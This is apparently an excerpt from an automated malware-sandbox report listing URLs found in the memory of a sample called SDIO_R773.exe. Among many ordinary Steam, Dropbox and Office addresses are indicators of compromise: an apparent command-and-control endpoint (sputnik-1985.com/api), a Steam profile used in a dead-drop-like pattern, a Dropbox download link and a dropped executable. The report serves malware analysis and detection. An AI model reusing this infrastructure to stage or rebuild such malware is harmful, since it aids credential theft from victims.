              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=JWHwHdDIz5WW&l=e
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067904046.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.2060769006.0000000000D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dropbox.com/iZ
              Source: SDIO_R773.exe, 00000000.00000002.2067904046.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.2060769006.0000000000D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dropbox.com/v
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://forums.dropbox.com
              Source: SDIO_R773.exeString found in binary or memory: https://gcc.gnu.org/bugs/):
              Source: SDIO_R773.exeString found in binary or memory: https://github.com/arvidn/libtorrent/issues
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampo
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1969046002.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958490684.00000000047DF000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067744653.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2066797770.0000000000CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
              Source: SDIO_R773.exe, 00000000.00000003.2005003653.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067744653.0000000000D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiQ
              Source: SDIO_R773.exe, 00000000.00000003.1958490684.00000000047DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiW
              Source: SDIO_R773.exe, 00000000.00000003.2005093546.00000000047DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apii
              Source: SDIO_R773.exe, 00000000.00000003.1981585551.00000000047D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apijh
              Source: SDIO_R773.exe, 00000000.00000003.1958629667.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958490684.00000000047D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://status.dropbox.com
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: SDIO_R773.exe, 00000000.00000003.1829580838.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1829580838.0000000004834000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958554125.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958402349.000000000482D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.0000000004808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1829580838.0000000004834000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958554125.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958402349.000000000482D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.0000000004808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncu
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/dE
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com:443/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtn
              Source: SDIO_R773.exeString found in binary or memory: https://www.certum.pl/CPS0
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
